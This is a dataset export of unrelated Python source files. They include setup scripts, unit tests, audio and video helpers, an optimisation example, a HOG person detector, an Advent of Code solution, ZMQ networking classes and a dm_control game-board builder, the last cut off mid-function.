id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
from setuptools import setup

# Install locally with:
#   python3 -m pip install -e .

# ``long_description`` must be the *contents* of the README, not its
# filename: the original passed the literal string "README.md", so PyPI
# would have rendered those nine characters as the project description.
try:
    with open("README.md", encoding="utf-8") as readme:
        _long_description = readme.read()
except OSError:
    # Fall back to the plain name so a tree without the README still
    # installs instead of crashing at setup time (matches the original's
    # never-crash behaviour).
    _long_description = "README.md"

# This call to setup() does all the work.
setup(
    name="ctfpwn",
    version="3.0.1",
    description="Framework for making CTFs, bug bounty and pentesting Python scripting easier",
    long_description=_long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/bl4de/ctfpwn",
    author="<NAME> @bl4de",
    author_email="<EMAIL>",
    license="MIT",
    packages=["ctfpwn"],
    install_requires=["requests"],
)
| StarcoderdataPython |
6571373 | <filename>application/src/pytest/python/modules/notifications/schema_admin_test.py
from copy import copy
import pytest
from app import create_app
from config import Config
from modules.notifications.schema_admin import NotificationAdminSchema
from modules.notifications.model import Notification
from fixtures import Fixtures
@pytest.fixture
def app(request):
    """Yield a configured test app.

    Integration runs (anything not marked `unit`) additionally get database
    fixtures set up before the test and torn down afterwards.
    """
    test_config = copy(Config)
    test_config.TESTING = True
    is_admin = 'admin_api' in request.keywords
    test_config.APP_TYPE = 'admin' if is_admin else 'public'
    application = create_app(test_config)
    if 'unit' in request.keywords:
        # Unit tests never touch the database, so skip fixture management.
        yield application
        return
    db_fixtures = Fixtures(application)
    db_fixtures.setup()
    yield application
    db_fixtures.teardown()
# INTEGRATION TESTS
@pytest.mark.integration
@pytest.mark.admin_api
def test_login_schema_dump(app):
    """Admin schema dump of notification 1 exposes exactly the expected fields."""
    result = NotificationAdminSchema().dump(Notification.query.get(1))

    expected_scalars = {
        'id': 1,
        'channel': 1,
        'template': 'template-1',
        'service': 'Service 1',
        'notification_id': '123456',
        'accepted': 1,
        'rejected': 0,
        'sent_at': '2019-02-01T10:45:00+0000',
        'status': 1,
        'status_changed_at': '2019-02-03T00:00:00+0000',
        'created_at': '2019-02-01T00:00:00+0000',
        'updated_at': '2019-02-02T00:00:00+0000',
    }
    # 12 scalar fields plus the nested `user` object.
    assert len(result) == 13
    for field, value in expected_scalars.items():
        assert result[field] == value
    assert result['user']['id'] == 1
    assert result['user']['username'] == 'user1'
    assert result['user']['uri'] == 'http://localhost/user/1'
| StarcoderdataPython |
3305170 | <reponame>welfare-state-analytics/pyriksprot
from __future__ import annotations
import sqlite3
from contextlib import nullcontext
from functools import cached_property
import pandas as pd
from . import utility as mdu
# Table name -> key column used when loading each table from the SQLite
# database into a DataFrame.  The table names double as attribute names on
# UtteranceIndex.
DATA_TABLES: dict[str, str] = {
    'protocols': 'document_id',
    'utterances': 'u_id',
    'unknown_utterance_gender': 'u_id',
    'unknown_utterance_party': 'u_id',
}
# Shared empty placeholder used before `load()` has populated the index.
null_frame: pd.DataFrame = pd.DataFrame()
class UtteranceIndex:
    """In-memory index of the utterance metadata tables listed in DATA_TABLES."""

    def __init__(self):
        # All tables start as the shared empty placeholder until load() runs.
        self.protocols: pd.DataFrame = null_frame
        self.utterances: pd.DataFrame = null_frame
        self.unknown_utterance_gender: pd.DataFrame = null_frame
        self.unknown_utterance_party: pd.DataFrame = null_frame

    def load(self, source: str | sqlite3.Connection | dict) -> UtteranceIndex:
        """Populate the index from a database path or an open connection.

        NOTE(review): the annotation also allows a dict, but any non-str
        source is handed to nullcontext() as if it were a connection --
        confirm whether dict sources are actually supported.
        NOTE(review): a connection opened here from a path is committed by
        the `with` block but never closed.
        """
        with (sqlite3.connect(database=source) if isinstance(source, str) else nullcontext(source)) as db:
            tables: dict[str, pd.DataFrame] = mdu.load_tables(DATA_TABLES, db=db)
            for table_name, table in tables.items():
                # Table names match the attribute names initialised above.
                setattr(self, table_name, table)
        return self

    @cached_property
    def unknown_party_lookup(self) -> dict[str, int]:
        """Utterance `u_id` to `party_id` mapping (computed once, then cached)."""
        return self.unknown_utterance_party['party_id'].to_dict()

    @cached_property
    def unknown_gender_lookup(self) -> dict[str, int]:
        """Utterance `u_id` to `gender_id` mapping (computed once, then cached)."""
        return self.unknown_utterance_gender['gender_id'].to_dict()

    def protocol(self, document_id: int) -> pd.Series:
        """Return the row for a single protocol, indexed by `document_id`."""
        return self.protocols.loc[document_id]
| StarcoderdataPython |
4981477 | namelist = 'wav', 'mp3'
| StarcoderdataPython |
1926845 | <reponame>mudkipmaster/gwlf-e
from gwlfe.AFOS.GrazingAnimals.Losses.GRStreamN import AvGRStreamN
from gwlfe.AFOS.GrazingAnimals.Losses.GRStreamN import AvGRStreamN_f
def NFENCING(PctStreams, PctGrazing, GrazingAnimal_0, NumAnimals, AvgAnimalWt, AnimalDailyN, n42, n45, n69):
    """Nitrogen load reduction attributable to stream fencing.

    Scales the average grazing-animal stream nitrogen loss by the fenced
    fraction (n45 / n42) and the effectiveness factor n69.

    Returns 0 when n42 <= 0 (the original VB code lacked this fallback and
    would have errored).
    """
    # Guard first -- consistent with NFENCING_f, and avoids computing the
    # stream-loss term when the result is 0 anyway.
    if n42 > 0:  # based on the code, n42 is always > 0 (may not need to check)
        grsn = AvGRStreamN(PctStreams, PctGrazing, GrazingAnimal_0, NumAnimals, AvgAnimalWt, AnimalDailyN)
        return (n45 / n42) * n69 * grsn
    return 0
def NFENCING_f(PctStreams, PctGrazing, GrazingAnimal_0, NumAnimals, AvgAnimalWt, AnimalDailyN, n42, n45, n69):
    """Vectorized variant of NFENCING, delegating to AvGRStreamN_f."""
    if n42 <= 0:
        # Per the original note, n42 is expected to always be positive, so
        # this fallback should be unreachable in practice.
        return 0
    stream_n = AvGRStreamN_f(PctStreams, PctGrazing, GrazingAnimal_0, NumAnimals, AvgAnimalWt, AnimalDailyN)
    return (n45 / n42) * n69 * stream_n
| StarcoderdataPython |
9672342 | <reponame>ayoubBouziane/TrainingSpeech<gh_stars>1-10
import os
import pytest
from training_speech import ffmpeg
CURRENT_DIR = os.path.dirname(__file__)
@pytest.mark.parametrize('kwargs, expected_call', [
    (dict(from_='foo.mp3', to='foo.wav'), 'ffmpeg -y -i foo.mp3 -loglevel quiet foo.wav'),
    (dict(from_='foo.mp3', to='foo.wav', rate=16000, channels=1), 'ffmpeg -y -i foo.mp3 -ar 16000 -ac 1 -loglevel quiet foo.wav'),
])
def test_convert(kwargs, expected_call, mocker):
    """convert() builds the expected ffmpeg command line for each option set."""
    # subprocess.call is mocked, so no real ffmpeg process is spawned.
    call_mock = mocker.patch('subprocess.call', return_value=0)
    ffmpeg.convert(**kwargs)
    assert call_mock.call_count == 1
    call_args, call_kwargs = call_mock.call_args
    # convert() passes an argv list; joining reconstructs the command line.
    assert ' '.join(call_args[0]) == expected_call
@pytest.mark.parametrize('kwargs, expected_call', [
    # Both bounds given: cut() dispatches to sox (note: trim takes a
    # start offset and a *duration*, hence "trim 1 9").
    (
        dict(input_path='input.wav', output_path='output.wav', from_=1, to=10),
        'sox input.wav output.wav trim 1 9',
    ),
    # Only a start offset: ffmpeg with -ss.
    (
        dict(input_path='input.wav', output_path='output.wav', from_=1),
        'ffmpeg -y -i input.wav -ss 1 -loglevel quiet -c copy output.wav',
    ),
    # Only an end bound: ffmpeg with -to.
    (
        dict(input_path='input.wav', output_path='output.wav', to=10),
        'ffmpeg -y -i input.wav -to 10 -loglevel quiet -c copy output.wav',
    ),
])
def test_cut(kwargs, expected_call, mocker):
    """cut() picks the right tool and command line for each bound combination."""
    call_mock = mocker.patch('subprocess.call', return_value=0)
    ffmpeg.cut(**kwargs)
    assert call_mock.call_count == 1
    call_args, call_kwargs = call_mock.call_args
    assert ' '.join(call_args[0]) == expected_call
@pytest.mark.parametrize('input_file, noise_level, min_duration, expected_silences', [
    ('test.wav', -50, 0.05, [(0, 0.178), (1.024, 1.458), (2.048, 2.61), (3.072, 4.864)]),
    ('silence.wav', -50, 0.05, [(0.0, 1.108)]),
    ('silence.mp3', -50, 0.05, [(0.0, 1.108)]),
    ('silence2.wav', -50, 0.05, [(0.462, 0.896), (0.974, 2.0)]),
    ('silence3.wav', -45, 0.07, [(0.0, 0.454), (1.21, 1.467)]),
])
def test_list_silences(input_file, noise_level, min_duration, expected_silences):
    """Silence detection on bundled assets yields known (start, end) spans."""
    path_to_wav = os.path.join(CURRENT_DIR, f'./assets/{input_file}')
    # force=True bypasses any cached detection result for the asset.
    silences = ffmpeg.list_silences(path_to_wav, noise_level=noise_level, min_duration=min_duration, force=True)
    assert expected_silences == silences
def test_audio_duration():
    """Duration of the bundled test fixture is reported exactly."""
    fixture = os.path.join(CURRENT_DIR, './assets/test.wav')
    assert ffmpeg.audio_duration(fixture) == 4.864
| StarcoderdataPython |
9618483 | """
Simple, non parallel optimization set up example.
"""
import sys,os
sys.path.insert(0,'../../../')
from glennopt.helpers import mutation_parameters, de_mutation_type, parallel_settings
from glennopt.base import Parameter
from glennopt.optimizers import NSGA3
from glennopt.DOE import FullFactorial, CCD, LatinHyperCube, Default
# Generate the DOE
current_dir = os.getcwd()
pop_size = 32
ns = NSGA3(eval_command = "python evaluation.py", eval_folder="Evaluation",pop_size=pop_size,optimization_folder=current_dir)
# Latin hypercube sampling with 128 design points over three variables.
doe = LatinHyperCube(128)
doe.add_parameter(name="x1",min_value=-5,max_value=5)
doe.add_parameter(name="x2",min_value=-5,max_value=5)
doe.add_parameter(name="x3",min_value=-5,max_value=5)
ns.add_eval_parameters(eval_params=doe.eval_parameters) # Add the evaluation parameters from doe to NSGA3
doe.add_objectives(name='objective1')
doe.add_objectives(name='objective2')
ns.add_objectives(objectives=doe.objectives)
# Performance parameters: tracked alongside the objectives but not optimized.
# (The original comment said "No performance Parameters", contradicting the
# three add_perf_parameter calls below.)
doe.add_perf_parameter(name='p1')
doe.add_perf_parameter(name='p2')
doe.add_perf_parameter(name='p3')
ns.add_performance_parameters(performance_params = doe.perf_parameters)
# Mutation settings
ns.mutation_params.mutation_type = de_mutation_type.de_rand_1_bin
ns.mutation_params.F = 0.4
ns.mutation_params.C = 0.7
# Parallel settings
p = parallel_settings()
p.concurrent_executions = 10
p.cores_per_execution = 2
p.execution_timeout = 1 # minutes
p.machine_filename = 'machinefile.txt'
ns.parallel_settings = p
# Run the DOE first, then continue optimizing from the latest population.
ns.start_doe(doe.generate_doe())
ns.optimize_from_population(pop_start=-1,n_generations=50)
| StarcoderdataPython |
4915742 | <gh_stars>0
import cv2
# Test script: HOG-based pedestrian detection over a video file.
# Initializing the Histograms of Oriented Gradients person detector
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
cap = cv2.VideoCapture("test_assets/test2.mp4")
while cap.isOpened():
    # Reading the video stream; ret is False once the stream is exhausted.
    ret, image = cap.read()
    if ret:
        # resizing for better performance but it reduces frame rate
        #image = imutils.resize(image, width=min(400, image.shape[1]))
        # Detecting on grayscale image is faster.
        gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
        # Detecting all the regions in the Image that has a human inside it
        (regions, _) = hog.detectMultiScale(gray, winStride=(4, 4), padding=(4, 4), scale=1.05)
        # Drawing the regions in the coloured image (red, 1px boxes)
        for (x, y, w, h) in regions:
            cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 1)
        # Showing the output Image; 'q' quits.
        cv2.imshow("Output", image)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    else:
        break
cap.release()
cv2.destroyAllWindows() | StarcoderdataPython |
40569 | # Copyright (c) 2020 Samplasion <<EMAIL>>
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
TARGET = 2020
def main():
    """Entry point: print a banner, load the puzzle input, run both parts."""
    banner = "============="
    print(banner)
    print("= AoC Day 1 =")
    print(banner)
    print()
    with open("input.txt") as handle:
        raw = handle.read()
    numbers = sorted(int(line) for line in raw.split("\n"))
    phase1(numbers)
    phase2(numbers)
def phase1(numbers, target=2020):
    """Find two entries of sorted `numbers` that sum to `target`.

    Prints the pair and returns their product, or prints a message and
    returns None when no such pair exists.  `numbers` must be sorted
    ascending.

    Fixes vs. the original: the pointer variables no longer shadow the
    `min`/`max` builtins, and the scan terminates cleanly instead of
    crossing its pointers (which could pair an element with itself or
    raise IndexError) when no pair sums to the target.
    """
    lo = 0
    hi = len(numbers) - 1
    # Classic two-pointer scan over a sorted list: a too-large sum moves
    # the right pointer left, a too-small sum moves the left pointer right.
    while lo < hi:
        total = numbers[lo] + numbers[hi]
        if total == target:
            print(f"[Part 1] {numbers[lo]} and {numbers[hi]} are the numbers that amount to {target}. " +
                  f"Their product is {numbers[lo]*numbers[hi]}")
            return numbers[lo] * numbers[hi]
        if total > target:
            hi -= 1
        else:
            lo += 1
    print("There's no pair of numbers that amounts to {}".format(target))
    return None
def phase2(numbers, target=2020):
    """Find three distinct entries of `numbers` that sum to `target`.

    Prints the triple and returns their product, or prints a message and
    returns None when no such triple exists.

    Fixes vs. the original triple loop, which iterated values independently
    and could therefore count the same entry two or three times; iterating
    index combinations guarantees distinct entries.
    """
    from itertools import combinations  # stdlib, used only here

    for a, b, c in combinations(numbers, 3):
        if a + b + c == target:
            print(f"[Part 2] {a}, {b} and {c} are the numbers that amount to {target}. " +
                  f"Their product is {a*b*c}")
            return a * b * c
    print(f"There's no group of 3 numbers that sums to {target}.")
    return None
if __name__ == '__main__':
main() | StarcoderdataPython |
3403583 | <reponame>tfwcn/Mask_RCNN
import os
import argparse
import re
# Renames every file in `images_dir` that does not already match the
# "img (N).ext" pattern, assigning the lowest unused N.
parser = argparse.ArgumentParser()
parser.add_argument("images_dir")
args = parser.parse_args()
index = 0
for file_name in os.listdir(args.images_dir):
    full_path = os.path.join(args.images_dir, file_name)
    if os.path.isfile(full_path):
        # Regex for already-renamed files; re.I makes it case-insensitive.
        match_pattern = r"^(img \([0-9]+\))(\.[0-9a-z]+)$"
        matchObj = re.match(match_pattern, file_name, re.I)
        # print("matchObj", matchObj)
        # Found a file that has not been renamed yet.
        if matchObj == None:
            print("file_name", file_name)
            # Generate a candidate name, skipping names already in use.
            new_name = "img ({0})".format(index)
            # Flag: is the candidate name free of collisions?
            is_new = False
            while is_new == False:
                is_new = True
                for file_name2 in os.listdir(args.images_dir):
                    matchObj2 = re.match(match_pattern, file_name2, re.I)
                    # Name collision -- bump the index and rescan.
                    if matchObj2 != None and matchObj2.group(1) == new_name:
                        index += 1
                        new_name = "img ({0})".format(index)
                        is_new = False
                        break
            # Re-attach the original extension.
            # NOTE(review): a file with no "."-extension makes matchObj3 None
            # and this raises AttributeError -- confirm inputs always have one.
            match_pattern3 = r"^(.+)(\.[0-9a-z]+)$"
            matchObj3 = re.match(match_pattern3, file_name, re.I)
            new_name = "{0}{1}".format(new_name, matchObj3.group(2))
            print("new_name", new_name)
            new_full_path = os.path.join(args.images_dir, new_name)
            os.rename(full_path, new_full_path)
            index += 1
| StarcoderdataPython |
1691529 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from dataclasses import dataclass
from fairseq.dataclass import FairseqDataclass
from fairseq.optim.lr_scheduler import FairseqLRScheduler, register_lr_scheduler
@dataclass
class PassThroughScheduleConfig(FairseqDataclass):
    """Empty config: the pass-through scheduler has no options of its own."""
    pass
@register_lr_scheduler("pass_through", dataclass=PassThroughScheduleConfig)
class PassThroughScheduleSchedule(FairseqLRScheduler):
    """Delegate lr scheduling to the optimizer.

    Every scheduling hook simply forwards to the wrapped optimizer's own
    ``lr_scheduler``; this class exists so such optimizers fit the standard
    FairseqLRScheduler interface.
    """

    def __init__(self, cfg: PassThroughScheduleConfig, optimizer):
        super().__init__(cfg, optimizer)
        # Fail fast: delegation is impossible without an embedded scheduler.
        assert (
            hasattr(optimizer, "lr_scheduler") and optimizer.lr_scheduler is not None
        ), "Pass-through schedule can only be used with optimizers with their own schedulers"

    def state_dict(self):
        """Forward checkpoint state to the delegate scheduler."""
        return self.optimizer.lr_scheduler.state_dict()

    def load_state_dict(self, state_dict):
        """Restore checkpoint state on the delegate scheduler."""
        self.optimizer.lr_scheduler.load_state_dict(state_dict)

    def step_begin_epoch(self, epoch):
        """Update the learning rate at the beginning of the given epoch."""
        return self.optimizer.lr_scheduler.step_begin_epoch(epoch)

    def step_update(self, num_updates):
        """Update the learning rate after each update."""
        return self.optimizer.lr_scheduler.step_update(num_updates)
| StarcoderdataPython |
3436725 | # -*- coding: utf-8 -*-
# Copyright CERN since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
import shutil
import sys
from setuptools import setup, find_packages
# Refuse to install on unsupported interpreters.
if sys.version_info < (3, 6):
    print('ERROR: Rucio Server requires at least Python 3.6 to run.')
    sys.exit(1)
# setuputil lives next to this file; retry the import with this directory
# on sys.path when setup.py is invoked from elsewhere.
try:
    from setuputil import server_requirements_table, match_define_requirements, get_rucio_version
except ImportError:
    sys.path.append(os.path.abspath(os.path.dirname(__file__)))
    from setuputil import server_requirements_table, match_define_requirements, get_rucio_version
install_requires, extras_require = match_define_requirements(server_requirements_table)
name = 'rucio'
packages = find_packages(where='lib')
description = "Rucio Package"
# Extra files installed alongside the package (templates, helper tools).
data_files = [
    ('rucio/', ['requirements.txt']),
    ('rucio/etc/', glob.glob('etc/*.template')),
    ('rucio/etc/web', glob.glob('etc/web/*.template')),
    ('rucio/tools/', ['tools/bootstrap.py', 'tools/reset_database.py', 'tools/merge_rucio_configs.py']),
    ('rucio/etc/mail_templates/', glob.glob('etc/mail_templates/*.tmpl')),
]
scripts = glob.glob('bin/rucio*')
# Remove stale build artifacts so old egg-info cannot leak into this build.
if os.path.exists('build/'):
    shutil.rmtree('build/')
if os.path.exists('lib/rucio_clients.egg-info/'):
    shutil.rmtree('lib/rucio_clients.egg-info/')
if os.path.exists('lib/rucio.egg-info/'):
    shutil.rmtree('lib/rucio.egg-info/')
# All metadata assembled above; this call does the actual packaging work.
setup(
    name=name,
    version=get_rucio_version(),
    packages=packages,
    package_dir={'': 'lib'},
    data_files=data_files,
    include_package_data=True,
    scripts=scripts,
    author="Rucio",
    author_email="<EMAIL>",
    description=description,
    license="Apache License, Version 2.0",
    url="https://rucio.cern.ch/",
    python_requires=">=3.6, <4",
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'License :: OSI Approved :: Apache Software License',
        'Intended Audience :: Information Technology',
        'Intended Audience :: System Administrators',
        'Operating System :: POSIX :: Linux',
        'Natural Language :: English',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
        'Environment :: No Input/Output (Daemon)', ],
    install_requires=install_requires,
    extras_require=extras_require,
)
| StarcoderdataPython |
6644395 | # coding: utf-8
from .analyze import CZSC, CzscTrader
from .utils.ta import SMA, EMA, MACD, KDJ
from .data.jq import JqCzscTrader
from . import aphorism
# Package metadata; also interpolated into the import-time banner below.
__version__ = "0.7.8"
__author__ = "zengbin93"
__email__ = "<EMAIL>"
__date__ = "20210925"
# NOTE(review): printing at import time is a side effect every importer sees.
print(f"欢迎使用CZSC!当前版本标识为 {__version__}@{__date__}\n")
aphorism.print_one()
| StarcoderdataPython |
8018110 | # 公用配置
# Flask debug mode (applies to every environment that loads this module).
DEBUG = True
# Do not echo every SQL statement SQLAlchemy executes.
SQLALCHEMY_ECHO = False
# Disable the modification-tracking event system (saves memory).
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_ENCODING = "utf8mb4"
# NOTE(review): hard-coded secret key -- should come from the environment
# (or a secrets store) rather than source control in production.
SECRET_KEY = "root"
| StarcoderdataPython |
5187519 | from datapackage_pipelines_knesset.common.base_processors.base_resource import BaseResourceProcessor
class AddResourceBaseProcessor(BaseResourceProcessor):
    """Base processor that appends one brand-new resource to the datapackage
    instead of matching and modifying an existing resource.

    Subclasses override _get_new_resource_descriptor / _get_new_resource to
    define the appended resource's metadata and rows.
    """

    def _get_new_resource_descriptor(self):
        # you can use this to add attributes (other then schema / path / name - which are added automatically)
        return {}

    def _get_new_resource(self):
        # should yield the new resource rows
        # the rows will be processed further via the standard filter_resources / filter_resource / filter_ros methods
        yield from []

    def _is_matching_resource_number(self, resource_number, resource_descriptor=None):
        # no matching needed, we append the resource
        return False

    def _filter_resource_descriptors(self, resource_descriptors):
        descriptors = super(AddResourceBaseProcessor, self)._filter_resource_descriptors(resource_descriptors)
        # append the new resource descriptor; remember its position so
        # _filter_resources can emit the matching resource last
        self._resource_number = len(descriptors)
        descriptors.append(self._filter_resource_descriptor(self._resource_number, self._get_new_resource_descriptor()))
        return descriptors

    def _filter_resources(self, resources):
        # pass through all existing resources first, then the appended one
        yield from super(AddResourceBaseProcessor, self)._filter_resources(resources)
        yield self._filter_resource(self._resource_number, self._get_new_resource())
| StarcoderdataPython |
12826091 | # -*- coding: utf-8 -*-
from zmq.eventloop.zmqstream import ZMQStream
from zmq import Context,PULL,PUSH
from program_top.utilities.ip_and_socket import get_local_ip
from program_top.components import component_base
class zmq_listen_connection(object):
    '''A listening ZMQ connection (PULL socket bound on all interfaces).'''
    def __init__(self,port_number,callback_function):
        '''
        port_number: TCP port (int) to bind on 0.0.0.0.
        callback_function: invoked with each received message.
        '''
        super(zmq_listen_connection, self).__init__()
        self.__context=Context()
        self.__socket=self.__context.socket(PULL)
        self.__socket.bind("tcp://0.0.0.0:%d"%(port_number))
        # Wrap the socket in a tornado-compatible stream so the callback
        # fires from the event loop on receive.
        self.__stream_pull=ZMQStream(self.__socket)
        self.__stream_pull.on_recv(callback_function)
        pass
    pass
class zmq_send_connection(object):
    '''A sending ZMQ connection (PUSH socket); can connect to many peers.'''
    def __init__(self):
        self.__context=Context()
        self.__socket=self.__context.socket(PUSH)
        # NOTE(review): written but never read in this class -- confirm
        # whether it is still needed.
        self.__current_connection=None
    def connect(self,target_address,target_port):
        # Connect the PUSH socket to one more remote PULL endpoint.
        self.__socket.connect("tcp://%s:%d"%(target_address, target_port))
        pass
    def dis_connect(self, target_address, target_port):
        # Drop a previously connected endpoint.
        self.__socket.disconnect("tcp://%s:%d"%(target_address, target_port))
        pass
    def send(self,json_content):
        # Serialize and push a JSON-encodable object.
        self.__socket.send_json(json_content)
        pass
    pass
class zmq_io_gateway(component_base):
    '''
    Entry and exit point of the ZMQ networking module: one sender, and an
    optional listener bound to the given inbound port.
    '''
    def __init__(self,in_port,callback_entrance=None,binding_instance=None):
        '''in_port: inbound port number (int).
        callback_entrance: optional callback invoked for received messages;
        no listener is created when omitted.
        binding_instance: the component instance that owns this gateway.
        '''
        super(zmq_io_gateway, self).__init__(binding_instance)
        self.sender=zmq_send_connection()
        # Resolve the LAN IP using the owner's platform information.
        platform_category=binding_instance._environment_pack['current_platform_info']['current_system_category']
        self.lan_ip=get_local_ip(platform_category)
        if callback_entrance:
            self.listener=zmq_listen_connection(in_port,callback_entrance)
            pass
        pass
pass | StarcoderdataPython |
6469527 | /Users/NikhilArora/anaconda3/lib/python3.6/re.py | StarcoderdataPython |
5081016 | <reponame>duykienvp/sigspatial-2020-spatial-privacy-pricing
import numpy
from scipy.stats import rv_continuous
from pup.algorithms import util
from pup.common.checkin import Checkin
from pup.common.grid import Grid
from pup.common.rectangle import Rectangle
class NoisyCheckin(Checkin):
    """Noisy version of a check-in; the exact location information is removed.

    The exact location fields (lat, lon, location_id, x, y) are cleared and
    the location is instead described by two independent continuous
    distributions, one per axis.

    Attributes
    ----------
    noise_level: float
        noise level used for this noisy check-in
    rv_x: rv_continuous
        distribution of this noisy location over the x dimension
    rv_y: rv_continuous
        distribution of this noisy location over the y dimension
    """

    def __init__(self, c: Checkin, noise_level: float, rv_x: rv_continuous, rv_y: rv_continuous):
        """Build a noisy check-in from an exact one.

        Parameters
        ----------
        c: Checkin
            the check-in to inherit non-location data from
        noise_level: float
            noise level used for this noisy check-in
        rv_x: rv_continuous
            distribution over the x dimension
        rv_y: rv_continuous
            distribution over the y dimension
        """
        super().__init__(c.c_id, c.user_id, c.timestamp, c.datetime, c.lat, c.lon, c.location_id)
        # Exact location information is removed.
        self.lat = None
        self.lon = None
        self.location_id = None
        self.x = None
        self.y = None
        # Noise information.
        self.rv_x = rv_x
        self.rv_y = rv_y
        self.noise_level = noise_level

    def __str__(self):
        return "Checkin(user_id={user_id}, timestamp={timestamp}, datetime={datetime}, " \
               "lat={lat}, lon={lon}, location_id={location_id}, x={x}, y={y}, " \
               "rv_x={rv_x}, rv_y={rv_y}, noise_level={noise_level})".format(**vars(self))

    def cal_prob_inside_rect(self, rect: Rectangle) -> float:
        """Probability that the original check-in lies inside `rect`.

        Parameters
        ----------
        rect
            rectangle of interest

        Returns
        -------
        float
            the probability mass of (rv_x, rv_y) inside the rectangle
        """
        return util.cal_prob_inside_rect(rect, self.rv_x, self.rv_y)

    def cal_prob_grid(self, grid: Grid) -> numpy.ndarray:
        """Probability of the original check-in being inside each grid cell.

        Parameters
        ----------
        grid
            the grid

        Returns
        -------
        ndarray
            probabilities indexed by (x_cell, y_cell)
        """
        max_x_idx, max_y_idx = grid.get_shape()
        # CDF evaluated on every grid line of each dimension.
        x_cdf = [self.rv_x.cdf(x * grid.cell_len_x + grid.min_x) for x in range(max_x_idx + 1)]
        y_cdf = [self.rv_y.cdf(y * grid.cell_len_y + grid.min_y) for y in range(max_y_idx + 1)]
        # Per-cell probability is the CDF mass between consecutive grid lines
        # on each axis.  The original computed both differences negated
        # (cdf[i] - cdf[i+1]); the two minus signs cancelled in the product,
        # but the positive form below is the intended quantity and is
        # numerically identical.
        probs = numpy.zeros((max_x_idx, max_y_idx))
        for x in range(max_x_idx):
            for y in range(max_y_idx):
                prob_x = x_cdf[x + 1] - x_cdf[x]
                prob_y = y_cdf[y + 1] - y_cdf[y]
                # NOTE: not renormalised by the mass inside the grid domain,
                # matching the original behaviour.
                probs[x, y] = prob_x * prob_y
        return probs
| StarcoderdataPython |
9756734 | # Copyright 2020 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Composer entities corresponding to game boards."""
import copy
import os
from dm_control import composer
from dm_control import mjcf
import numpy as np
from dm_control.utils import io as resources
_TOUCH_THRESHOLD = 1e-3 # Activation threshold for touch sensors (N).
# whether to display underlying sensors for Goboard (useful to align texture)
_SHOW_DEBUG_GRID = False
_TEXTURE_PATH = os.path.join(os.path.dirname(__file__), 'goboard_7x7.png')
def _make_checkerboard(rows,
                       columns,
                       square_halfwidth,
                       height=0.01,
                       sensor_size=0.7,
                       name='checkerboard'):
    """Builds a checkerboard with touch sensors centered on each square.

    Args:
        rows: number of rows of squares.
        columns: number of columns of squares.
        square_halfwidth: half the side length of one square.
        height: half-height of each square box geom.
        sensor_size: sensor site halfwidth as a fraction of square_halfwidth.
        name: model name for the MJCF root.

    Returns:
        (mjcf root, list of square geoms, list of touch sensors), the lists
        in row-major order.
    """
    root = mjcf.RootElement(model=name)
    black_mat = root.asset.add('material', name='black', rgba=(0.2, 0.2, 0.2, 1))
    white_mat = root.asset.add('material', name='white', rgba=(0.8, 0.8, 0.8, 1))
    sensor_mat = root.asset.add('material', name='sensor', rgba=(0, 1, 0, 0.3))
    root.default.geom.set_attributes(
        type='box', size=(square_halfwidth, square_halfwidth, height))
    root.default.site.set_attributes(
        type='box',
        size=(sensor_size * square_halfwidth,) * 2 + (0.5 * height,),
        material=sensor_mat, group=composer.SENSOR_SITES_GROUP)
    # Square centers, symmetric about the board origin.
    xpos = (np.arange(columns) - 0.5*(columns - 1)) * 2 * square_halfwidth
    ypos = (np.arange(rows) - 0.5*(rows - 1)) * 2 * square_halfwidth
    geoms = []
    touch_sensors = []
    for i in range(rows):
        for j in range(columns):
            # Alternate colors in the usual checkerboard pattern.
            geom_mat = black_mat if ((i % 2) == (j % 2)) else white_mat
            name = '{}_{}'.format(i, j)
            geoms.append(
                root.worldbody.add(
                    'geom',
                    pos=(xpos[j], ypos[i], height),
                    name=name,
                    material=geom_mat))
            # The sensor site floats just above the square it covers.
            site = root.worldbody.add('site', pos=(xpos[j], ypos[i], 2*height),
                                      name=name)
            touch_sensors.append(root.sensor.add('touch', site=site, name=name))
    return root, geoms, touch_sensors
def _make_goboard(boardsize,
                  square_halfwidth,
                  height=0.01,
                  sensor_size=0.7,
                  name='goboard'):
    """Builds a Go board with touch sensors centered on each intersection.

    In addition to the per-intersection geoms/sensors, a wide "pass" strip
    is added below the board for registering a pass move.

    Args:
        boardsize: board dimension (boardsize x boardsize intersections).
        square_halfwidth: half the side length of one intersection cell.
        height: half-height of the box geoms.
        sensor_size: sensor site halfwidth as a fraction of square_halfwidth.
        name: model name for the MJCF root.

    Returns:
        (mjcf root, intersection geoms, touch sensors, pass geom, pass sensor).
    """
    y_offset = -0.08
    rows = boardsize
    columns = boardsize
    root = mjcf.RootElement(model=name)
    if _SHOW_DEBUG_GRID:
        black_mat = root.asset.add('material', name='black',
